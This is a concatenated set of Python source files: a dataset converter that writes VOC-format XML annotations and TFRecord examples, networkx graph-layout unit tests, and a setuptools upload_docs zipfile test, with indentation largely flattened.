shutil.copy(jpg, os.path.join(voc_path, 'CI2018', 'JPEGImages', prepend + '_' + filename))
def write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin, xml, voc_path):
"""
Write XML file in VOC format
Parameters:
fd - folder
fn - filename
db - database
w - width
h - height
name - object class
xmax - lower right x coordinate
xmin - upper left x coordinate
ymax - lower right y coordinate
ymin - upper left y coordinate
xml - xml file name
voc_path - path to write XML file
Returns:
None
"""
full_fn = xml.split('/')[-1]
xml_fn = full_fn.split('.')[0] + '.xml'
f = open(os.path.join(voc_path, 'CI2018', 'Annotations', xml_fn), 'w')
line = '<annotation>\n'; f.write(line)
line = '\t<filename>' + full_fn + '</filename>\n'; f.write(line)
line = '\t<folder>' + fd + '</folder>\n'; f.write(line)
line = '\t<object>\n'; f.write(line)
line = '\t\t<name>' + name + '</name>\n'; f.write(line)
line = '\t\t<bndbox>\n'; f.write(line)
line = '\t\t\t<xmax>' + xmax + '</xmax>\n'; f.write(line)
line = '\t\t\t<xmin>' + xmin + '</xmin>\n'; f.write(line)
line = '\t\t\t<ymax>' + ymax + '</ymax>\n'; f.write(line)
line = '\t\t\t<ymin>' + ymin + '</ymin>\n'; f.write(line)
line = '\t\t</bndbox>\n'; f.write(line)
    # Only compute difficulty when all four coordinates are present;
    # otherwise int() would raise on a partially filled box.
    if xmax != '' and xmin != '' and ymax != '' and ymin != '':
if int(xmax)-int(xmin) < 10 or int(ymax)-int(ymin) < 10:
line = '\t\t<difficult>1</difficult>\n'; f.write(line)
else:
line = '\t\t<difficult>0</difficult>\n'; f.write(line)
else:
line = '\t\t<difficult>0</difficult>\n'; f.write(line)
line = '\t\t<occluded>0</occluded>\n'; f.write(line)
line = '\t\t<pose>Unspecified</pose>\n'; f.write(line)
line = '\t\t<truncated>0</truncated>\n'; f.write(line)
line = '\t</object>\n'; f.write(line)
line = '\t<segmented>0</segmented>\n'; f.write(line)
line = '\t<size>\n'; f.write(line)
line = '\t\t<depth>3</depth>\n'; f.write(line)
line = '\t\t<height>' + h + '</height>\n'; f.write(line)
line = '\t\t<width>' + w + '</width>\n'; f.write(line)
line = '\t</size>\n'; f.write(line)
line = '\t<source>\n'; f.write(line)
line = '\t\t<database>' + db + '</database>\n'; f.write(line)
line = '\t</source>\n'; f.write(line)
line = '</annotation>'; f.write(line)
f.close()
def write_pbtxt(class_labels, type_data):
"""
Write .pbtxt file with a list of all classes in dataset
Parameters:
class_labels - list of dataset classes (sorted)
type_data - type of data (13 or 100)
Returns:
None
"""
if not os.path.exists('data'):
os.makedirs('data')
if type_data == 13:
f = open(os.path.join('data', 'ci_label_map_coarse.pbtxt'), 'w')
else:
f = open(os.path.join('data', 'ci_label_map.pbtxt'), 'w')
#f = open(os.path.join('data', 'ci_label_map_' + str(type_data) + '.pbtxt'), 'w')
for idx, label in enumerate(class_labels):
line = 'item {\n'; f.write(line)
line = '\tid: ' + str(idx+1) + '\n'; f.write(line)
line = '\tname: "' + label + '"\n}\n'; f.write(line)
f.close()
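

# For class_labels = ['car', 'person'] (hypothetical), the generated .pbtxt
# contains one 1-indexed entry per class:
#   item {
#     id: 1
#     name: "car"
#   }
#   item {
#     id: 2
#     name: "person"
#   }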
def convert_xml(ci_path, voc_path, type_data):
"""
Copy XML files from the CI directory to VOC Annotations directory
while converting the contents of the XML file and renaming based on the
image.
XML files will be named by prepending the "video" (directory) name.
Ex. 360(12)-2/0001.xml -> 360_12_2_0001.xml
Parameters:
ci_path - path to original CI training data
voc_path - path to VOC Annotations directory to write to
type_data - 13-class dataset or 100-class dataset
Returns:
None
"""
class_labels = []
num_noname = 0
for video in sorted(os.listdir(ci_path)):
if video == '.DS_Store': # For MAC
continue
vid_path = os.path.join(ci_path, video)
prepend = determine_prepend(vid_path)
for filename in os.listdir(os.path.join(ci_path, video)):
if filename.split('.')[-1] == 'xml':
xml = os.path.join(ci_path, video, filename)
xml_fn = prepend + '_' + filename
# fd = folder
# fn = filename
# db = database
# w, h = image width, height
fd, fn, db, w, h, name, xmax, xmin, ymax, ymin = read_ci_xml(xml, type_data)
if not name == '' and not name in class_labels:
class_labels.append(name)
if name == '':
num_noname += 1
#write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin,
# xml_fn, voc_path)
jpg_fn = xml_fn.split('.')[0] + '.jpg'
write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin,
jpg_fn, voc_path)
return class_labels, num_noname
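

# End-to-end usage sketch (paths hypothetical) for the 13-class dataset:
#   make_voc_directories('/data/VOC')
#   copy_images('/data/CI', '/data/VOC')
#   labels, skipped = convert_xml('/data/CI', '/data/VOC', 13)
#   write_pbtxt(sorted(labels), 13)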
### Re-ID Utilities
def reid_read_xml(xml_file):
"""
Read XML tree structure to get bounding box coordinates
Parameters:
xml_file - XML file in CI format
Returns:
xmax - bottom right x coordinate
xmin - top left x coordinate
ymax - bottom right y coordinate
ymin - top left y coordinate
"""
tree = etree.parse(xml_file)
root = tree.getroot()
xmin, xmax, ymin, ymax = '', '', '', ''
for child in root:
if child.tag == 'object':
for child2 in child:
if child2.tag == 'bndbox':
for child3 in child2:
if child3.tag == 'xmax':
xmax = child3.text
if child3.tag == 'xmin':
xmin = child3.text
if child3.tag == 'ymax':
ymax = child3.text
if child3.tag == 'ymin':
ymin = child3.text
return (xmax, xmin, ymax, ymin)
### TFRecord Utils
def dict_to_tf_example(data,
dataset_directory,
label_map_dict,
ignore_difficult_instances=False,
image_subdirectory='JPEGImages'):
"""Convert XML derived dict to tf.Example proto.
Notice that this function normalizes the bounding box coordinates provided
by the raw data.
Args:
data: dict holding CI XML fields for a single image (obtained by
running dataset_util.recursive_parse_xml_to_dict)
dataset_directory: Path to root directory holding CI dataset
label_map_dict: A map from string label names to integers ids.
ignore_difficult_instances: Whether to skip difficult instances in the
dataset (default: False).
image_subdirectory: String specifying subdirectory within the
CI dataset directory holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by data['filename'] is not a valid JPEG
"""
#img_path = os.path.join(data['folder'], image_subdirectory, data['filename'])
img_path = os.path.join('CI2018', image_subdirectory, data['filename'])
full_path = os.path.join(dataset_directory, img_path)
with tf.gfile.GFile(full_path, 'rb') as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = PIL.Image.open(encoded_jpg_io)
if image.format != 'JPEG':
raise ValueError('Image format not JPEG')
key = hashlib.sha256(encoded_jpg).hexdigest()
width = int(data['size']['width'])
height = int(data['size']['height'])
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
truncated = []
poses = []
difficult_obj = []
for obj in data['object']:
difficult = bool(int(obj['difficult']))
if ignore_difficult_instances and difficult:
continue
difficult_obj.append(int(difficult))
if obj['bndbox']['xmin'] is None or obj['bndbox']['xmax'] is None or obj['bndbox']['ymin'] is None or obj['bndbox']['ymax'] is None:
continue
xmin.append(float(obj['bndbox']['xmin']) / width)
ymin.append(float(obj['bndbox']['ymin']) / height)
xmax.append(float(obj['bndbox']['xmax']) / width)
ymax.append(float(obj['bndbox']['ymax']) / height)
classes_text.append(obj['name'].encode('utf8'))
classes.append(label_map_dict[obj['name']])
truncated.append(int(obj['truncated']))
poses.append(obj['pose'].encode('utf8'))
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_util.int64_feature(height),
'image/width': dataset_util.int64_feature(width),
'image/filename': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/source_id': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text),
'image/object/class/label': dataset_util.int64_list_feature(classes),
'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),
'image/object/truncated': dataset_util.int64_list_feature(truncated),
'image/object/view': dataset_util.bytes_list_feature(poses),
}))
return example | mit |
SpaceGroupUCL/qgisSpaceSyntaxToolkit | esstoolkit/external/networkx/drawing/tests/test_layout.py | 1 | 15534 | """Unit tests for layout functions."""
import networkx as nx
from networkx.testing import almost_equal
import pytest
numpy = pytest.importorskip("numpy")
scipy = pytest.importorskip("scipy")
class TestLayout:
@classmethod
def setup_class(cls):
cls.Gi = nx.grid_2d_graph(5, 5)
cls.Gs = nx.Graph()
nx.add_path(cls.Gs, "abcdef")
cls.bigG = nx.grid_2d_graph(25, 25) # > 500 nodes for sparse
@staticmethod
def collect_node_distances(positions):
distances = []
prev_val = None
for k in positions:
if prev_val is not None:
diff = positions[k] - prev_val
distances.append(numpy.dot(diff, diff) ** 0.5)
prev_val = positions[k]
return distances
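
    # Illustrative (hypothetical positions): for {0: array([0., 0.]),
    # 1: array([3., 4.])}, collect_node_distances returns [5.0] -- the
    # Euclidean gaps between successive nodes in iteration order.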
def test_spring_fixed_without_pos(self):
G = nx.path_graph(4)
pytest.raises(ValueError, nx.spring_layout, G, fixed=[0])
pos = {0: (1, 1), 2: (0, 0)}
pytest.raises(ValueError, nx.spring_layout, G, fixed=[0, 1], pos=pos)
nx.spring_layout(G, fixed=[0, 2], pos=pos) # No ValueError
def test_spring_init_pos(self):
# Tests GH #2448
import math
G = nx.Graph()
G.add_edges_from([(0, 1), (1, 2), (2, 0), (2, 3)])
init_pos = {0: (0.0, 0.0)}
fixed_pos = [0]
pos = nx.fruchterman_reingold_layout(G, pos=init_pos, fixed=fixed_pos)
has_nan = any(math.isnan(c) for coords in pos.values() for c in coords)
assert not has_nan, "values should not be nan"
def test_smoke_empty_graph(self):
G = []
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.spectral_layout(G)
nx.shell_layout(G)
nx.bipartite_layout(G, G)
nx.spiral_layout(G)
nx.multipartite_layout(G)
nx.kamada_kawai_layout(G)
def test_smoke_int(self):
G = self.Gi
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.fruchterman_reingold_layout(self.bigG)
nx.spectral_layout(G)
nx.spectral_layout(G.to_directed())
nx.spectral_layout(self.bigG)
nx.spectral_layout(self.bigG.to_directed())
nx.shell_layout(G)
nx.spiral_layout(G)
nx.kamada_kawai_layout(G)
nx.kamada_kawai_layout(G, dim=1)
nx.kamada_kawai_layout(G, dim=3)
def test_smoke_string(self):
G = self.Gs
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.spectral_layout(G)
nx.shell_layout(G)
nx.spiral_layout(G)
nx.kamada_kawai_layout(G)
nx.kamada_kawai_layout(G, dim=1)
nx.kamada_kawai_layout(G, dim=3)
def check_scale_and_center(self, pos, scale, center):
center = numpy.array(center)
low = center - scale
hi = center + scale
vpos = numpy.array(list(pos.values()))
length = vpos.max(0) - vpos.min(0)
assert (length <= 2 * scale).all()
assert (vpos >= low).all()
assert (vpos <= hi).all()
def test_scale_and_center_arg(self):
sc = self.check_scale_and_center
c = (4, 5)
G = nx.complete_graph(9)
G.add_node(9)
sc(nx.random_layout(G, center=c), scale=0.5, center=(4.5, 5.5))
# rest can have 2*scale length: [-scale, scale]
sc(nx.spring_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.spectral_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.circular_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.shell_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.spiral_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.kamada_kawai_layout(G, scale=2, center=c), scale=2, center=c)
c = (2, 3, 5)
sc(nx.kamada_kawai_layout(G, dim=3, scale=2, center=c), scale=2, center=c)
def test_planar_layout_non_planar_input(self):
G = nx.complete_graph(9)
pytest.raises(nx.NetworkXException, nx.planar_layout, G)
def test_smoke_planar_layout_embedding_input(self):
embedding = nx.PlanarEmbedding()
embedding.set_data({0: [1, 2], 1: [0, 2], 2: [0, 1]})
nx.planar_layout(embedding)
def test_default_scale_and_center(self):
sc = self.check_scale_and_center
c = (0, 0)
G = nx.complete_graph(9)
G.add_node(9)
sc(nx.random_layout(G), scale=0.5, center=(0.5, 0.5))
sc(nx.spring_layout(G), scale=1, center=c)
sc(nx.spectral_layout(G), scale=1, center=c)
sc(nx.circular_layout(G), scale=1, center=c)
sc(nx.shell_layout(G), scale=1, center=c)
sc(nx.spiral_layout(G), scale=1, center=c)
sc(nx.kamada_kawai_layout(G), scale=1, center=c)
c = (0, 0, 0)
sc(nx.kamada_kawai_layout(G, dim=3), scale=1, center=c)
def test_circular_planar_and_shell_dim_error(self):
G = nx.path_graph(4)
pytest.raises(ValueError, nx.circular_layout, G, dim=1)
pytest.raises(ValueError, nx.shell_layout, G, dim=1)
pytest.raises(ValueError, nx.shell_layout, G, dim=3)
pytest.raises(ValueError, nx.planar_layout, G, dim=1)
pytest.raises(ValueError, nx.planar_layout, G, dim=3)
def test_adjacency_interface_numpy(self):
A = nx.to_numpy_array(self.Gs)
pos = nx.drawing.layout._fruchterman_reingold(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._fruchterman_reingold(A, dim=3)
assert pos.shape == (6, 3)
pos = nx.drawing.layout._sparse_fruchterman_reingold(A)
assert pos.shape == (6, 2)
def test_adjacency_interface_scipy(self):
A = nx.to_scipy_sparse_matrix(self.Gs, dtype="d")
pos = nx.drawing.layout._sparse_fruchterman_reingold(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._sparse_spectral(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._sparse_fruchterman_reingold(A, dim=3)
assert pos.shape == (6, 3)
def test_single_nodes(self):
G = nx.path_graph(1)
vpos = nx.shell_layout(G)
assert not vpos[0].any()
G = nx.path_graph(4)
vpos = nx.shell_layout(G, [[0], [1, 2], [3]])
assert not vpos[0].any()
assert vpos[3].any() # ensure node 3 not at origin (#3188)
assert numpy.linalg.norm(vpos[3]) <= 1 # ensure node 3 fits (#3753)
vpos = nx.shell_layout(G, [[0], [1, 2], [3]], rotate=0)
assert numpy.linalg.norm(vpos[3]) <= 1 # ensure node 3 fits (#3753)
def test_smoke_initial_pos_fruchterman_reingold(self):
pos = nx.circular_layout(self.Gi)
npos = nx.fruchterman_reingold_layout(self.Gi, pos=pos)
def test_fixed_node_fruchterman_reingold(self):
# Dense version (numpy based)
pos = nx.circular_layout(self.Gi)
npos = nx.spring_layout(self.Gi, pos=pos, fixed=[(0, 0)])
assert tuple(pos[(0, 0)]) == tuple(npos[(0, 0)])
# Sparse version (scipy based)
pos = nx.circular_layout(self.bigG)
npos = nx.spring_layout(self.bigG, pos=pos, fixed=[(0, 0)])
for axis in range(2):
assert almost_equal(pos[(0, 0)][axis], npos[(0, 0)][axis])
def test_center_parameter(self):
G = nx.path_graph(1)
nx.random_layout(G, center=(1, 1))
vpos = nx.circular_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.planar_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spring_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.fruchterman_reingold_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spectral_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.shell_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spiral_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
def test_center_wrong_dimensions(self):
G = nx.path_graph(1)
assert id(nx.spring_layout) == id(nx.fruchterman_reingold_layout)
pytest.raises(ValueError, nx.random_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.circular_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.planar_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spring_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spring_layout, G, dim=3, center=(1, 1))
pytest.raises(ValueError, nx.spectral_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spectral_layout, G, dim=3, center=(1, 1))
pytest.raises(ValueError, nx.shell_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spiral_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.kamada_kawai_layout, G, center=(1, 1, 1))
def test_empty_graph(self):
G = nx.empty_graph()
vpos = nx.random_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.circular_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.planar_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.bipartite_layout(G, G)
assert vpos == {}
vpos = nx.spring_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.fruchterman_reingold_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.spectral_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.shell_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.spiral_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.multipartite_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.kamada_kawai_layout(G, center=(1, 1))
assert vpos == {}
def test_bipartite_layout(self):
G = nx.complete_bipartite_graph(3, 5)
top, bottom = nx.bipartite.sets(G)
vpos = nx.bipartite_layout(G, top)
assert len(vpos) == len(G)
top_x = vpos[list(top)[0]][0]
bottom_x = vpos[list(bottom)[0]][0]
for node in top:
assert vpos[node][0] == top_x
for node in bottom:
assert vpos[node][0] == bottom_x
vpos = nx.bipartite_layout(
G, top, align="horizontal", center=(2, 2), scale=2, aspect_ratio=1
)
assert len(vpos) == len(G)
top_y = vpos[list(top)[0]][1]
bottom_y = vpos[list(bottom)[0]][1]
for node in top:
assert vpos[node][1] == top_y
for node in bottom:
assert vpos[node][1] == bottom_y
pytest.raises(ValueError, nx.bipartite_layout, G, top, align="foo")
def test_multipartite_layout(self):
sizes = (0, 5, 7, 2, 8)
G = nx.complete_multipartite_graph(*sizes)
vpos = nx.multipartite_layout(G)
assert len(vpos) == len(G)
start = 0
for n in sizes:
end = start + n
assert all(vpos[start][0] == vpos[i][0] for i in range(start + 1, end))
start += n
vpos = nx.multipartite_layout(G, align="horizontal", scale=2, center=(2, 2))
assert len(vpos) == len(G)
start = 0
for n in sizes:
end = start + n
assert all(vpos[start][1] == vpos[i][1] for i in range(start + 1, end))
start += n
pytest.raises(ValueError, nx.multipartite_layout, G, align="foo")
def test_kamada_kawai_costfn_1d(self):
costfn = nx.drawing.layout._kamada_kawai_costfn
pos = numpy.array([4.0, 7.0])
invdist = 1 / numpy.array([[0.1, 2.0], [2.0, 0.3]])
cost, grad = costfn(pos, numpy, invdist, meanweight=0, dim=1)
assert almost_equal(cost, ((3 / 2.0 - 1) ** 2))
assert almost_equal(grad[0], -0.5)
assert almost_equal(grad[1], 0.5)
def check_kamada_kawai_costfn(self, pos, invdist, meanwt, dim):
costfn = nx.drawing.layout._kamada_kawai_costfn
cost, grad = costfn(pos.ravel(), numpy, invdist, meanweight=meanwt, dim=dim)
expected_cost = 0.5 * meanwt * numpy.sum(numpy.sum(pos, axis=0) ** 2)
for i in range(pos.shape[0]):
for j in range(i + 1, pos.shape[0]):
diff = numpy.linalg.norm(pos[i] - pos[j])
expected_cost += (diff * invdist[i][j] - 1.0) ** 2
assert almost_equal(cost, expected_cost)
dx = 1e-4
for nd in range(pos.shape[0]):
for dm in range(pos.shape[1]):
idx = nd * pos.shape[1] + dm
pos0 = pos.flatten()
pos0[idx] += dx
cplus = costfn(
pos0, numpy, invdist, meanweight=meanwt, dim=pos.shape[1]
)[0]
pos0[idx] -= 2 * dx
cminus = costfn(
pos0, numpy, invdist, meanweight=meanwt, dim=pos.shape[1]
)[0]
assert almost_equal(grad[idx], (cplus - cminus) / (2 * dx), places=5)
def test_kamada_kawai_costfn(self):
invdist = 1 / numpy.array([[0.1, 2.1, 1.7], [2.1, 0.2, 0.6], [1.7, 0.6, 0.3]])
meanwt = 0.3
# 2d
pos = numpy.array([[1.3, -3.2], [2.7, -0.3], [5.1, 2.5]])
self.check_kamada_kawai_costfn(pos, invdist, meanwt, 2)
# 3d
pos = numpy.array([[0.9, 8.6, -8.7], [-10, -0.5, -7.1], [9.1, -8.1, 1.6]])
self.check_kamada_kawai_costfn(pos, invdist, meanwt, 3)
def test_spiral_layout(self):
G = self.Gs
# a lower value of resolution should result in a more compact layout
# intuitively, the total distance from the start and end nodes
# via each node in between (transiting through each) will be less,
# assuming rescaling does not occur on the computed node positions
pos_standard = nx.spiral_layout(G, resolution=0.35)
pos_tighter = nx.spiral_layout(G, resolution=0.34)
distances = self.collect_node_distances(pos_standard)
distances_tighter = self.collect_node_distances(pos_tighter)
assert sum(distances) > sum(distances_tighter)
# return near-equidistant points after the first value if set to true
pos_equidistant = nx.spiral_layout(G, equidistant=True)
distances_equidistant = self.collect_node_distances(pos_equidistant)
for d in range(1, len(distances_equidistant) - 1):
# test similarity to two decimal places
assert almost_equal(
distances_equidistant[d], distances_equidistant[d + 1], 2
)
def test_rescale_layout_dict(self):
G = nx.empty_graph()
vpos = nx.random_layout(G, center=(1, 1))
assert nx.rescale_layout_dict(vpos) == {}
G = nx.empty_graph(2)
vpos = {0: (0.0, 0.0), 1: (1.0, 1.0)}
s_vpos = nx.rescale_layout_dict(vpos)
norm = numpy.linalg.norm
assert norm([sum(x) for x in zip(*s_vpos.values())]) < 1e-6
G = nx.empty_graph(3)
vpos = {0: (0, 0), 1: (1, 1), 2: (0.5, 0.5)}
s_vpos = nx.rescale_layout_dict(vpos)
assert s_vpos == {0: (-1, -1), 1: (1, 1), 2: (0, 0)}
s_vpos = nx.rescale_layout_dict(vpos, scale=2)
assert s_vpos == {0: (-2, -2), 1: (2, 2), 2: (0, 0)}
| gpl-3.0 |
vivianli32/TravelConnect | flask/lib/python3.4/site-packages/setuptools/tests/test_upload_docs.py | 522 | 2139 | """build_ext tests
"""
import sys, os, shutil, tempfile, unittest, site, zipfile
from setuptools.command.upload_docs import upload_docs
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo')
"""
class TestUploadDocsTest(unittest.TestCase):
def setUp(self):
self.dir = tempfile.mkdtemp()
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'w')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
os.chdir(self.dir)
self.upload_dir = os.path.join(self.dir, 'build')
os.mkdir(self.upload_dir)
# A test document.
f = open(os.path.join(self.upload_dir, 'index.html'), 'w')
f.write("Hello world.")
f.close()
# An empty folder.
os.mkdir(os.path.join(self.upload_dir, 'empty'))
if sys.version >= "2.6":
self.old_base = site.USER_BASE
site.USER_BASE = upload_docs.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = upload_docs.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
if sys.version >= "2.6":
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_create_zipfile(self):
# Test to make sure zipfile creation handles common cases.
# This explicitly includes a folder containing an empty folder.
dist = Distribution()
cmd = upload_docs(dist)
cmd.upload_dir = self.upload_dir
cmd.target_dir = self.upload_dir
tmp_dir = tempfile.mkdtemp()
tmp_file = os.path.join(tmp_dir, 'foo.zip')
try:
            cmd.create_zipfile(tmp_file)
            assert zipfile.is_zipfile(tmp_file)
            # Re-open the archive to inspect its contents.
            zip_file = zipfile.ZipFile(tmp_file)
            assert zip_file.namelist() == ['index.html']
            zip_file.close()
finally:
shutil.rmtree(tmp_dir)
| mit |